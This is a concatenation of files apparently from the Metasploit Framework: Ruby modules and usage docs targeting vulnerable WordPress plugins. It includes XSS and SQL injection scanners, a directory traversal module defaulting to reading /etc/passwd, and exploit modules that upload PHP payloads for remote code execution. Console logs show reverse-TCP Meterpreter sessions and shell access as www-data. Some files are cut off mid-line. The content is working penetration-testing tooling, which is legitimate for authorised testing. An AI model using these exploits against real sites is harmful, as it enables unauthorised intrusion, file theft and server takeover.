/modules/auxiliary/scanner/http/wp_thecartpress_xss_scanner.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Exploit::Remote::HTTP::Wordpress 11 | include Msf::Auxiliary::Scanner 12 | include Msf::Auxiliary::Report 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress TheCartPress Plugin XSS Scanner', 17 | 'Description' => %q{ 18 | This module attempts to exploit a authenticated Cross-Site Scripting in TheCartPress Plugin for WordPress, 19 | version 1.3.9 and likely prior in order if the instance is vulnerable. (Tested with TheCartPress 1.3.8.2 version, 20 | but 1.3.9 works). 21 | }, 22 | 'Author' => 23 | [ 24 | 'High-Tech Bridge', # Vulnerability Discovery 25 | 'Roberto Soares Espreto ' # Metasploit Module 26 | ], 27 | 'License' => MSF_LICENSE, 28 | 'References' => 29 | [ 30 | ['CVE', '2015-3302'], 31 | ['EDB', '36860'], 32 | ['WPVDB', '7951'], 33 | ['URL', 'https://www.htbridge.com/advisory/HTB23254'] 34 | ], 35 | 'DisclosureDate' => 'Apr 29 2015' 36 | )) 37 | 38 | register_options( 39 | [ 40 | OptString.new('WP_USER', [true, 'A valid username', nil]), 41 | OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil]) 42 | ], self.class) 43 | end 44 | 45 | def check 46 | check_plugin_version_from_readme('thecartpress') 47 | end 48 | 49 | def user 50 | datastore['WP_USER'] 51 | end 52 | 53 | def password 54 | datastore['WP_PASSWORD'] 55 | end 56 | 57 | def run_host(ip) 58 | print_status("#{peer} - Trying to login as #{user}") 59 | cookie = wordpress_login(user, password) 60 | if cookie.nil? 61 | print_error("#{peer} - Unable to login as #{user}") 62 | return 63 | end 64 | print_good("#{peer} - Login successful") 65 | 66 | xss = Rex::Text.rand_text_alpha(8) 67 | xss_payload = "\"'>" 68 | 69 | res = send_request_cgi( 70 | 'uri' => normalize_uri(wordpress_url_backend, 'admin.php'), 71 | 'vars_get' => { 72 | 'page' => normalize_uri('thecartpress', 'admin', 'AddressEdit.php'), 73 | 'address_name' => xss_payload, 74 | 'firstname' => xss_payload, 75 | 'lastname' => xss_payload, 76 | 'street' => xss_payload, 77 | 'city' => xss_payload, 78 | 'postcode' => xss_payload, 79 | 'email' => xss_payload 80 | }, 81 | 'cookie' => cookie 82 | ) 83 | 84 | unless res && res.body 85 | print_error("#{peer} - Server did not respond in an expected way") 86 | return 87 | end 88 | 89 | if res.code == 200 && res.body =~ /#{xss}/ 90 | print_good("#{peer} - Vulnerable to Cross-Site Scripting the \"TheCartPress 1.3.9\" plugin for WordPress") 91 | p = store_local('wp_thecartpress.http', 'text/html', res.body, "#{xss}") 92 | print_good("Save in: #{p}") 93 | else 94 | print_error("#{peer} - Failed, maybe the target isn't vulnerable.") 95 | end 96 | end 97 | end 98 | -------------------------------------------------------------------------------- /documentation/auxiliary/wp_aprils_super_function_xss_scanner.md: -------------------------------------------------------------------------------- 1 | #### Add WordPress Plugin April's Super Function Pack XSS Vulnerability. 2 | 3 | Application: WordPress Plugin 'April's Super Function Pack' 1.4.7 4 | Homepage: https://wordpress.org/plugins/aprils-super-functions-pack/ 5 | Source Code: https://downloads.wordpress.org/plugin/aprils-super-functions-pack.1.4.7.zip 6 | References: https://wpvulndb.com/vulnerabilities/7068 7 | 8 | #### Vulnerable packages* 9 | 10 | 1.4.7 11 | 12 | #### Usage: 13 | 14 | ##### Linux (Ubuntu 12.04.5 LTS): 15 | ``` 16 | msf > use auxiliary/scanner/http/wp_aprils_super_function_xss_scanner 17 | msf auxiliary(wp_aprils_super_function_xss_scanner) > show options 18 | 19 | Module options (auxiliary/scanner/http/wp_aprils_super_function_xss_scanner): 20 | 21 | Name Current Setting Required Description 22 | ---- --------------- -------- ----------- 23 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 24 | RHOSTS yes The target address range or CIDR identifier 25 | RPORT 80 yes The target port 26 | TARGETURI / yes The base path to the wordpress application 27 | THREADS 1 yes The number of concurrent threads 28 | VHOST no HTTP server virtual host 29 | 30 | msf auxiliary(wp_aprils_super_function_xss_scanner) > info 31 | 32 | Name: WordPress April's Super Function Pack XSS Scanner 33 | Module: auxiliary/scanner/http/wp_aprils_super_function_xss_scanner 34 | License: Metasploit Framework License (BSD) 35 | Rank: Normal 36 | Disclosed: 2014-01-06 37 | 38 | Provided by: 39 | Unknown 40 | Roberto Soares Espreto 41 | 42 | Basic options: 43 | Name Current Setting Required Description 44 | ---- --------------- -------- ----------- 45 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 46 | RHOSTS yes The target address range or CIDR identifier 47 | RPORT 80 yes The target port 48 | TARGETURI / yes The base path to the wordpress application 49 | THREADS 1 yes The number of concurrent threads 50 | VHOST no HTTP server virtual host 51 | 52 | Description: 53 | This module attempts to exploit a Cross-Site Scripting in April's 54 | Super Function Pack Plugin for WordPress, version 1.4.7 and likely 55 | prior in order if the instance is vulnerable. 56 | 57 | References: 58 | http://cvedetails.com/cve/2014-100026/ 59 | http://www.osvdb.org/101807 60 | https://wpvulndb.com/vulnerabilities/7068 61 | 62 | msf auxiliary(wp_aprils_super_function_xss_scanner) > set RHOSTS 192.168.1.31 63 | RHOSTS => 192.168.1.31 64 | msf auxiliary(wp_aprils_super_function_xss_scanner) > check 65 | [*] 192.168.1.31:80 - The target appears to be vulnerable. 66 | [*] Checked 1 of 1 hosts (100% complete) 67 | msf auxiliary(wp_aprils_super_function_xss_scanner) > run 68 | 69 | [+] 192.168.1.31:80 - Vulnerable to Cross-Site Scripting the "April's Super Function Pack 1.4.7" plugin for WordPress 70 | [*] Scanned 1 of 1 hosts (100% complete) 71 | [*] Auxiliary module execution completed 72 | msf auxiliary(wp_aprils_super_function_xss_scanner) > 73 | ``` 74 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_cp_image_storage_file_read.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Auxiliary::Report 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Auxiliary::Scanner 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress CP Image Store File Read Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits a directory traversal vulnerability in WordPress 19 | Plugin "CP Image Store with SlideShow" version 1.0.5, allowing to read 20 | arbitrary files with the web server privileges. 21 | }, 22 | 'References' => 23 | [ 24 | ['EDB', '37559'], 25 | ['WPVDB', '8094'] 26 | ], 27 | 'Author' => 28 | [ 29 | 'Joaquin Ramirez Martinez', # Vulnerability Discovery 30 | 'Roberto Soares Espreto ' # Metasploit Module 31 | ], 32 | 'License' => MSF_LICENSE 33 | )) 34 | 35 | register_options( 36 | [ 37 | OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']), 38 | OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 7 ]), 39 | OptString.new('WP_USER', [true, 'Username wordpress', nil]), 40 | OptString.new('WP_PASS', [true, 'Password to logon', nil]) 41 | ], self.class) 42 | end 43 | 44 | def user 45 | datastore['WP_USER'] 46 | end 47 | 48 | def password 49 | datastore['WP_PASS'] 50 | end 51 | 52 | def check 53 | check_plugin_version_from_readme('cp-image-store', '1.0.6') 54 | end 55 | 56 | def run_host(ip) 57 | 58 | vprint_status("#{peer} - Trying to login as: #{user}") 59 | cookie = wordpress_login(user, password) 60 | if cookie.nil? 61 | print_error("#{peer} - Unable to login as: #{user}") 62 | return 63 | end 64 | 65 | traversal = "../" * datastore['DEPTH'] 66 | filename = datastore['FILEPATH'] 67 | filename = filename[1, filename.length] if filename =~ /^\// 68 | 69 | email = Rex::Text::rand_text_alpha_lower(5) + '@' + Rex::Text::rand_text_alpha_lower(5) + '.com' 70 | 71 | res = send_request_cgi( 72 | 'method' => 'GET', 73 | 'uri' => target_uri.path, 74 | 'vars_get' => { 75 | 'action' => 'cpis_init', 76 | 'cpis-action' => 'f-download', 77 | 'purchase_id' => '1', 78 | 'cpis_user_email' => "#{email}", 79 | 'f' => "#{traversal}#{filename}" 80 | }, 81 | 'cookie' => cookie 82 | ) 83 | 84 | if res && res.code == 200 85 | 86 | vprint_status('Downloading file...') 87 | vprint_line("\n#{res.body}") 88 | fname = datastore['FILEPATH'] 89 | 90 | path = store_loot( 91 | 'cpimagestore.traversal', 92 | 'text/plain', 93 | ip, 94 | res.body, 95 | fname 96 | ) 97 | 98 | print_good("#{peer} - File saved in: #{path}") 99 | else 100 | print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.") 101 | end 102 | end 103 | end 104 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_eshop_xss_scanner.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Exploit::Remote::HTTP::Wordpress 11 | include Msf::Auxiliary::Scanner 12 | include Msf::Auxiliary::Report 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress eShop XSS Scanner', 17 | 'Description' => %q{ 18 | This module attempts to exploit a Cross-Site Scripting in eShop Plugin 19 | for WordPress, version 6.3.13 and likely prior in order if the instance 20 | is vulnerable. 21 | }, 22 | 'Author' => 23 | [ 24 | 'Ehsan Hosseini', # Vulnerability Discovery 25 | 'Roberto Soares Espreto ' # Metasploit Module 26 | ], 27 | 'License' => MSF_LICENSE, 28 | 'References' => 29 | [ 30 | ['PACKETSTORM', '133480'], 31 | ['WPVDB', '8180'] 32 | ], 33 | 'DisclosureDate' => 'Sep 04 2015' 34 | )) 35 | 36 | register_options( 37 | [ 38 | OptString.new('WP_USERNAME', [true, 'A valid username', nil]), 39 | OptString.new('WP_PASSWORD', [true, 'A valid password', nil]) 40 | ], self.class 41 | ) 42 | end 43 | 44 | def check 45 | check_plugin_version_from_readme('eshop', '6.3.14') 46 | end 47 | 48 | def user 49 | datastore['WP_USERNAME'] 50 | end 51 | 52 | def password 53 | datastore['WP_PASSWORD'] 54 | end 55 | 56 | def run_host(ip) 57 | vprint_status("#{peer} - Trying to login as: #{user}:#{password}") 58 | cookie = wordpress_login(user, password) 59 | fail_with(Failure::NoAccess, "Unable to login as: #{user}:#{password}") if cookie.nil? 60 | 61 | value = Rex::Text.rand_text_numeric(8) 62 | xss = "\">" 63 | 64 | data = Rex::MIME::Message.new 65 | data.add_part('M', nil, nil, 'form-data; name="uptime"') 66 | data.add_part('', nil, nil, 'form-data; name="MAX_FILE_SIZE"') 67 | data.add_part(xss, 'application/x-php', nil, 'form-data; name="title"') 68 | data.add_part('yes', nil, nil, 'form-data; name="overwrite"') 69 | data.add_part('upload File', nil, nil, 'form-data; name="up"') 70 | post_data = data.to_s 71 | 72 | vprint_status("#{peer} - Sending payload...") 73 | res = send_request_cgi( 74 | 'method' => 'POST', 75 | 'uri' => normalize_uri(wordpress_url_backend, 'admin.php'), 76 | 'vars_get' => { 77 | 'page' => 'eshop-downloads.php', 78 | }, 79 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 80 | 'data' => post_data, 81 | 'cookie' => cookie 82 | ) 83 | 84 | fail_with(Failure::Unknown, 'Server did not respond in an expected way') unless res 85 | 86 | if res.code == 200 && res.body.include?("#{xss}") 87 | print_good("#{peer} - Vulnerable to Cross-Site Scripting the eShop 6.3.13 plugin for WordPress") 88 | p = store_local( 89 | 'eshop.http', 90 | 'text/html', 91 | res.body, 92 | value 93 | ) 94 | print_good("Save in: #{p}") 95 | else 96 | print_error("#{peer} - Failed, maybe the target isn't vulnerable.") 97 | end 98 | end 99 | end 100 | -------------------------------------------------------------------------------- /documentation/auxiliary/wp_business_intelligent_sqli_scanner.md: -------------------------------------------------------------------------------- 1 | #### Add WordPress Plugin Business Intelligence Lite SQL Injection Scanner. 2 | 3 | Application: WordPress Plugin 'Business Intelligence Lite' 1.6.1 4 | Homepage: https://wordpress.org/plugins/wp-business-intelligence-lite/ 5 | Source Code: https://downloads.wordpress.org/plugin/wp-business-intelligence-lite.1.6.1.zip 6 | References: https://wpvulndb.com/vulnerabilities/7879 7 | 8 | #### Vulnerable packages* 9 | 10 | 1.6.1 11 | 12 | #### Usage: 13 | 14 | ##### Linux (Ubuntu 12.04.5 LTS): 15 | ``` 16 | msf > use auxiliary/scanner/http/wp_business_intelligent_sqli_scanner 17 | msf auxiliary(wp_business_intelligent_sqli_scanner) > show options 18 | 19 | Module options (auxiliary/scanner/http/wp_business_intelligent_sqli_scanner): 20 | 21 | Name Current Setting Required Description 22 | ---- --------------- -------- ----------- 23 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 24 | RHOSTS yes The target address range or CIDR identifier 25 | RPORT 80 yes The target port 26 | SLEEP 7 yes Calculate the response time (7 is default) 27 | TARGETURI / yes The base path to the wordpress application 28 | THREADS 1 yes The number of concurrent threads 29 | VHOST no HTTP server virtual host 30 | 31 | msf auxiliary(wp_business_intelligent_sqli_scanner) > info 32 | 33 | Name: WordPress Business Inteligence Lite Unauthenticated SQLi Scanner 34 | Module: auxiliary/scanner/http/wp_business_intelligent_sqli_scanner 35 | License: Metasploit Framework License (BSD) 36 | Rank: Normal 37 | Disclosed: 2015-04-01 38 | 39 | Provided by: 40 | Jagriti Sahu 41 | Roberto Soares Espreto 42 | 43 | Basic options: 44 | Name Current Setting Required Description 45 | ---- --------------- -------- ----------- 46 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 47 | RHOSTS yes The target address range or CIDR identifier 48 | RPORT 80 yes The target port 49 | SLEEP 7 yes Calculate the response time (7 is default) 50 | TARGETURI / yes The base path to the wordpress application 51 | THREADS 1 yes The number of concurrent threads 52 | VHOST no HTTP server virtual host 53 | 54 | Description: 55 | This module attempts to exploit SQL injection in Business 56 | Intelligence Lite version 1.6.1 for WordPress and likely prior in 57 | order if the instance is vulnerable. 58 | 59 | References: 60 | https://wpvulndb.com/vulnerabilities/7879 61 | http://packetstormsecurity.com/files/131228/ 62 | 63 | msf auxiliary(wp_business_intelligent_sqli_scanner) > set RHOSTS 192.168.1.31 64 | RHOSTS => 192.168.1.31 65 | msf auxiliary(wp_business_intelligent_sqli_scanner) > check 66 | [*] 192.168.1.31:80 - The target appears to be vulnerable. 67 | [*] Checked 1 of 1 hosts (100% complete) 68 | msf auxiliary(wp_business_intelligent_sqli_scanner) > run 69 | 70 | [*] 192.168.1.31:80 - Checking host... 71 | [+] 192.168.1.31:80 - Vulnerable to unauthenticated SQL injection in "Business Intelligence Lite 1.6.1" plugin for WordPress 72 | [*] Scanned 1 of 1 hosts (100% complete) 73 | [*] Auxiliary module execution completed 74 | msf auxiliary(wp_business_intelligent_sqli_scanner) > 75 | ``` 76 | -------------------------------------------------------------------------------- /modules/exploits/unix/webapp/wp_woocommerce_file_upload.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress WooCommerce Amazon Affiliates Upload Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits an arbitrary file upload in the WordPress WooCommerce Amazon 19 | Affiliates version 7.0. It allows to upload arbitrary php files and get remote code 20 | execution. This module has been tested successfully on WordPress 4.2.1 on Ubuntu 21 | 14.04 Server. 22 | }, 23 | 'Author' => 24 | [ 25 | 'Evex_1337', # Vulnerability Discovery 26 | 'Roberto Soares Espreto ' # Metasploit Module 27 | ], 28 | 'License' => MSF_LICENSE, 29 | 'References' => 30 | [ 31 | ['WPVDB', '7940'], 32 | ['URL', 'http://packetstormsecurity.com/files/131629/'], 33 | ['URL', 'http://research.evex.pw/?vuln=13'] 34 | ], 35 | 'Privileged' => false, 36 | 'Platform' => 'php', 37 | 'Arch' => ARCH_PHP, 38 | 'Targets' => [['WooCommerce Amazon Affiliates 7.0', {}]], 39 | 'DisclosureDate' => 'Apr 01 2015', 40 | 'DefaultTarget' => 0) 41 | ) 42 | 43 | register_options( 44 | [ 45 | OptString.new('KEY', [true, 'A valid key on the target host', 'c125a47cba1e8ec73945dd622d142f79' ]) 46 | ], self.class 47 | ) 48 | end 49 | 50 | def check # rewrote check method 51 | release_log_url = normalize_uri(wordpress_url_plugins, 'wwc-amz-aff', 'plugin.php') 52 | check_version_from_custom_file(release_log_url, /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi, '7.0.1') 53 | end 54 | 55 | def inject(action) 56 | key = datastore['KEY'] 57 | 58 | res = send_request_cgi( 59 | 'uri' => normalize_uri(wordpress_url_plugins, 'wwc-amz-aff', 'modules', 'remote_support', 'remote_tunnel.php'), 60 | 'method' => 'POST', 61 | 'vars_post' => { 62 | 'connection_key' => key, 63 | 'action' => 'save_file', 64 | 'file' => '../../index.php', 65 | 'file_content' => Rex::Text.encode_base64(action) 66 | } 67 | ) 68 | 69 | if res 70 | if res.code == 200 && res.body.include?('"status":"valid"') && action == payload.encoded 71 | print_good("#{peer} - Injecting payload...") 72 | elsif res.code == 200 && res.body.include?('"status":"valid"') && action != payload.encoded 73 | print_good("Restored original content.") 74 | else 75 | fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}") 76 | end 77 | else 78 | fail_with(Failure::Unknown, 'Server did not answer') 79 | end 80 | return 81 | end 82 | 83 | def exploit 84 | inject(payload.encoded) 85 | print_status("#{peer} - Calling payload...") 86 | 87 | send_request_cgi( 88 | { 'uri' => normalize_uri(wordpress_url_plugins, 'wwc-amz-aff', 'index.php') }, 89 | 5 90 | ) 91 | 92 | original_content = " use exploit/unix/webapp/wp_reflexgallery_file_upload 17 | msf exploit(wp_reflexgallery_file_upload) > show options 18 | 19 | Module options (exploit/unix/webapp/wp_reflexgallery_file_upload): 20 | 21 | Name Current Setting Required Description 22 | ---- --------------- -------- ----------- 23 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 24 | RHOST yes The target address 25 | RPORT 80 yes The target port 26 | TARGETURI / yes The base path to the wordpress application 27 | VHOST no HTTP server virtual host 28 | 29 | 30 | Exploit target: 31 | 32 | Id Name 33 | -- ---- 34 | 0 Reflex Gallery 3.1.3 35 | 36 | 37 | msf exploit(wp_reflexgallery_file_upload) > info 38 | 39 | Name: WordPress Reflex Gallery Upload Vulnerability 40 | Module: exploit/unix/webapp/wp_reflexgallery_file_upload 41 | Platform: PHP 42 | Privileged: No 43 | License: Metasploit Framework License (BSD) 44 | Rank: Excellent 45 | Disclosed: 2014-10-22 46 | 47 | Provided by: 48 | TO DO 49 | Roberto Soares Espreto 50 | 51 | Available targets: 52 | Id Name 53 | -- ---- 54 | 0 Reflex Gallery 3.1.3 55 | 56 | Basic options: 57 | Name Current Setting Required Description 58 | ---- --------------- -------- ----------- 59 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 60 | RHOST yes The target address 61 | RPORT 80 yes The target port 62 | TARGETURI / yes The base path to the wordpress application 63 | VHOST no HTTP server virtual host 64 | 65 | Payload information: 66 | 67 | Description: 68 | This module exploits an arbitrary PHP code upload in the WordPress 69 | Reflex Gallery version 3.1.3. The vulnerability allows for arbitrary 70 | file upload and remote code execution. 71 | 72 | References: 73 | http://www.exploit-db.com/exploits/36374 74 | http://www.osvdb.org/88853 75 | https://wpvulndb.com/vulnerabilities/7867 76 | 77 | msf exploit(wp_reflexgallery_file_upload) > set RHOST 192.168.0.15 78 | RHOST => 192.168.0.15 79 | msf exploit(wp_reflexgallery_file_upload) > exploit 80 | 81 | [*] Started reverse handler on 192.168.0.14:4444 82 | [+] 192.168.0.15:80 - Our payload is at: pKTFvotjaaGW.php. Calling payload... 83 | [*] 192.168.0.15:80 - Calling payload... 84 | [*] Sending stage (40499 bytes) to 192.168.0.15 85 | [*] Meterpreter session 1 opened (192.168.0.14:4444 -> 192.168.0.15:36912) at 2015-04-16 08:32:55 -0300 86 | [+] Deleted pKTFvotjaaGW.php 87 | 88 | meterpreter > sysinfo 89 | Computer : msfdevel 90 | OS : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686 91 | Meterpreter : php/php 92 | meterpreter > shell 93 | Process 7144 created. 94 | Channel 0 created. 95 | 96 | id 97 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 98 | ``` 99 | -------------------------------------------------------------------------------- /documentation/exploits/wp_creativecontactform_file_upload.md: -------------------------------------------------------------------------------- 1 | #### Add WordPress Creative Contact Form 0.9.7 Shell Upload. 2 | 3 | Application: WordPress Creative Contact Form 4 | Homepage: https://wordpress.org/plugins/sexy-contact-form 5 | Source Code: https://downloads.wordpress.org/plugin/sexy-contact-form.0.9.7.zip 6 | Active Installs (wordpress.org): 5,000+ 7 | 8 | #### Vulnerable packages* 9 | 10 | 0.9.7 11 | 12 | #### Usage: 13 | 14 | ##### Linux (Ubuntu 12.04.5 LTS): 15 | ``` 16 | msf > use exploit/unix/webapp/wp_creativecontactform_file_upload 17 | msf exploit(wp_creativecontactform_file_upload) > show options 18 | 19 | Module options (exploit/unix/webapp/wp_creativecontactform_file_upload): 20 | 21 | Name Current Setting Required Description 22 | ---- --------------- -------- ----------- 23 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 24 | RHOST yes The target address 25 | RPORT 80 yes The target port 26 | TARGETURI / yes The base path to the wordpress application 27 | VHOST no HTTP server virtual host 28 | 29 | 30 | Exploit target: 31 | 32 | Id Name 33 | -- ---- 34 | 0 Creative Contact Form 0.9.7 35 | 36 | 37 | msf exploit(wp_creativecontactform_file_upload) > info 38 | 39 | Name: WordPress Creative Contact Form Upload Vulnerability 40 | Module: exploit/unix/webapp/wp_creativecontactform_file_upload 41 | Platform: PHP 42 | Privileged: No 43 | License: Metasploit Framework License (BSD) 44 | Rank: Excellent 45 | Disclosed: 2014-09-22 46 | 47 | Provided by: 48 | Gianni Angelozzi 49 | Roberto Soares Espreto 50 | 51 | Available targets: 52 | Id Name 53 | -- ---- 54 | 0 Creative Contact Form 0.9.7 55 | 56 | Basic options: 57 | Name Current Setting Required Description 58 | ---- --------------- -------- ----------- 59 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 60 | RHOST yes The target address 61 | RPORT 80 yes The target port 62 | TARGETURI / yes The base path to the wordpress application 63 | VHOST no HTTP server virtual host 64 | 65 | Payload information: 66 | 67 | Description: 68 | This module exploits an arbitrary PHP code upload in the WordPress 69 | Creative Contact Form version 0.9.7. The vulnerability allows for 70 | arbitrary file upload and remote code execution. 71 | 72 | References: 73 | http://www.exploit-db.com/exploits/35057 74 | http://www.osvdb.org/113669 75 | 76 | msf exploit(wp_creativecontactform_file_upload) > set RHOST 192.168.1.31 77 | RHOST => 192.168.1.31 78 | msf exploit(wp_creativecontactform_file_upload) > run 79 | 80 | [*] Started reverse handler on 192.168.1.46:4444 81 | [+] 192.168.1.31:80 - Our payload is at: kyfbCzwa.php. Calling payload... 82 | [*] 192.168.1.31:80 - Calling payload... 83 | [*] Sending stage (40499 bytes) to 192.168.1.31 84 | [*] Meterpreter session 1 opened (192.168.1.46:4444 -> 192.168.1.31:40393) at 2015-04-13 18:44:47 -0300 85 | [+] Deleted kyfbCzwa.php 86 | 87 | meterpreter > sysinfo 88 | Computer : msfdevel 89 | OS : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686 90 | Meterpreter : php/php 91 | meterpreter > shell 92 | Process 23370 created. 93 | Channel 0 created. 94 | 95 | id 96 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 97 | 98 | ``` 99 | -------------------------------------------------------------------------------- /documentation/exploits/wp_worktheflow_file_upload.md: -------------------------------------------------------------------------------- 1 | #### Add WordPress Work The Flow 2.5.2 Shell Upload. 2 | 3 | Application: WordPress Work The Flow File Upload 4 | Homepage: https://wordpress.org/plugins/work-the-flow-file-upload/ 5 | Source Code: https://downloads.wordpress.org/plugin/work-the-flow-file-upload.2.5.2.zip 6 | 7 | #### Vulnerable packages* 8 | 9 | 2.5.2 10 | 11 | #### Usage: 12 | 13 | ##### Linux (Ubuntu 12.04.5 LTS): 14 | ``` 15 | msf > use exploit/unix/webapp/wp_worktheflow_upload 16 | msf exploit(wp_worktheflow_upload) > show options 17 | 18 | Module options (exploit/unix/webapp/wp_worktheflow_upload): 19 | 20 | Name Current Setting Required Description 21 | ---- --------------- -------- ----------- 22 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 23 | RHOST localhost yes The target address 24 | RPORT 80 yes The target port 25 | TARGETURI / yes The base path to the wordpress application 26 | VHOST no HTTP server virtual host 27 | 28 | 29 | Payload options (php/meterpreter/reverse_tcp): 30 | 31 | Name Current Setting Required Description 32 | ---- --------------- -------- ----------- 33 | LHOST 127.0.0.1 yes The listen address 34 | LPORT 4444 yes The listen port 35 | 36 | 37 | Exploit target: 38 | 39 | Id Name 40 | -- ---- 41 | 0 Work The Flow 2.5.2 42 | 43 | 44 | msf exploit(wp_worktheflow_upload) > info 45 | 46 | Name: WordPress Work The Flow Upload Vulnerability 47 | Module: exploit/unix/webapp/wp_worktheflow_upload 48 | Platform: PHP 49 | Privileged: No 50 | License: Metasploit Framework License (BSD) 51 | Rank: Excellent 52 | 53 | Provided by: 54 | Claudio Viviani 55 | Roberto Soares Espreto 56 | 57 | Available targets: 58 | Id Name 59 | -- ---- 60 | 0 Work The Flow 2.5.2 61 | 62 | Basic options: 63 | Name Current Setting Required Description 64 | ---- --------------- -------- ----------- 65 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 66 | RHOST localhost yes The target address 67 | RPORT 80 yes The target port 68 | TARGETURI / yes The base path to the wordpress application 69 | VHOST no HTTP server virtual host 70 | 71 | Payload information: 72 | re 73 | Description: 74 | This module exploits an arbitrary PHP code upload in the WordPress 75 | Work The Flow plugin, version 2.5.2. The vulnerability allows for 76 | arbitrary file upload and remote code execution. 77 | 78 | References: 79 | http://packetstormsecurity.com/files/131294/WordPress-Work-The-Flow-2.5.2-Shell-Upload.html 80 | 81 | msf exploit(wp_worktheflow_upload) > set RHOST 192.168.1.31 82 | RHOST => 192.168.1.31 83 | msf exploit(wp_worktheflow_upload) > exploit 84 | 85 | [*] Started reverse handler on 192.168.1.46:4444 86 | [+] 192.168.1.31:80 - Our payload is at: XcHULYXfBVi.php. Calling payload... 87 | [*] 192.168.1.31:80 - Calling payload... 88 | [*] Sending stage (40499 bytes) to 192.168.1.31 89 | [*] Meterpreter session 1 opened (192.168.1.46:4444 -> 192.168.1.31:39966) at 2015-04-12 21:05:13 -0300 90 | [+] Deleted XcHULYXfBVi.php 91 | 92 | meterpreter > sysinfo 93 | Computer : msfdevel 94 | OS : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686 95 | Meterpreter : php/php 96 | meterpreter > 97 | ``` 98 | -------------------------------------------------------------------------------- /modules/exploits/unix/webapp/wp_showbiz_file_upload.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress ShowBiz Pro Upload Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits an arbitrary PHP code upload in the WordPress ThemePunch 19 | ShowBiz Pro plugin, version 1.7.1 and prior. The vulnerability allows for 20 | arbitrary file upload and remote code execution. 21 | }, 22 | 'Author' => 23 | [ 24 | 'Simo Ben youssef', # Vulnerability Discovery 25 | 'Roberto Soares Espreto ' # Metasploit Module 26 | ], 27 | 'License' => MSF_LICENSE, 28 | 'References' => 29 | [ 30 | ['EDB', '35385'], 31 | ['WPVDB', '7955'], 32 | ['OSVDB', '115118'], 33 | ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability'] 34 | ], 35 | 'Privileged' => false, 36 | 'Platform' => 'php', 37 | 'Arch' => ARCH_PHP, 38 | 'Targets' => [['ThemePunch Showbiz Pro (showbiz) 1.7.1', {}]], 39 | 'DisclosureDate' => 'Nov 26 2015', 40 | 'DefaultTarget' => 0) 41 | ) 42 | end 43 | 44 | def check 45 | release_log_url = normalize_uri(wordpress_url_plugins, 'showbizpro', 'release_log.html') 46 | # TO DO: Rewrite check. Time sleep now. :) 47 | check_version_from_custom_file(release_log_url, /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi, '1.7.2') 48 | end 49 | 50 | def exploit 51 | php_pagename = rand_text_alpha(4 + rand(4)) + '.php' 52 | 53 | payload_zip = Rex::Zip::Archive.new 54 | payload_zip.add_file('showbiz/' + php_pagename, payload.encoded) 55 | 56 | data = 